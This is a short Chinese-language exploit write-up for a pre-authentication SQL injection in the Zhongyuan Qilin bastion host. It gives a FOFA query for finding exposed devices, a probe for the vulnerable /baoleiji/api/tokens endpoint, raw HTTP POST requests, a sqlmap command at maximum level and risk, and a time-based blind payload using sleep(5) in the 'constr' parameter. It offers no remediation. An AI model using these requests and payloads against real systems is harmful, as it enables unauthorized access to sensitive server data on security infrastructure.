登录 白背景

中远麒麟堡垒机前台Sql注入

漏洞描述

中远麒麟堡垒机前台Sql注入,可获取服务器敏感信息

漏洞影响

中远麒麟堡垒机

FOFA

cert.subject="Baolei"

漏洞复现

判断漏洞是否存在:

访问 host/baoleiji/api/tokens如果返回405就大概率存在,404就没有

请求包:

POST/baoleiji/api/tokensHTTP/1.1 
Host:172.25.6.175 
User-Agent:Mozilla/5.0(compatible;Baiduspider/2.0;+http://www.baidu.com/search /spider.html)
Content-Length:64 
Accept:application/json,text/plain,*/*
Accept-Language:zh-CN,zh;q=0.9 
Content-Type:application/x-www-form-urlencoded 
Origin:https://172.25.6.175 
Referer:https://172.25.6.175/baoleiji/
Sec-Fetch-Mode:cors 
Sec-Fetch-Site:same-origin 
Accept-Encoding:gzip

constr=1&title=%40127.0.0.1

直接跑sqlmap:

sqlmap-r1.txt-pconstr--dbms=mysql--level5--risk3--batch

截图就不提供了,很多真实环境sqlmap跑不出来,需要手工验证

POST /baoleiji/api/tokens HTTP/1.1
Host: 172.25.6.175:443
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search
/spider.html)
Content-Length: 64
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Origin: https://172.25.6.175
Referer: https://172.25.6.175/baoleiji/
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip
constr=1'and(select*from(select+sleep(5))o)='&title=%40127.0.0.1

注入点为constr,时间盲注,可通过修改sleep来验证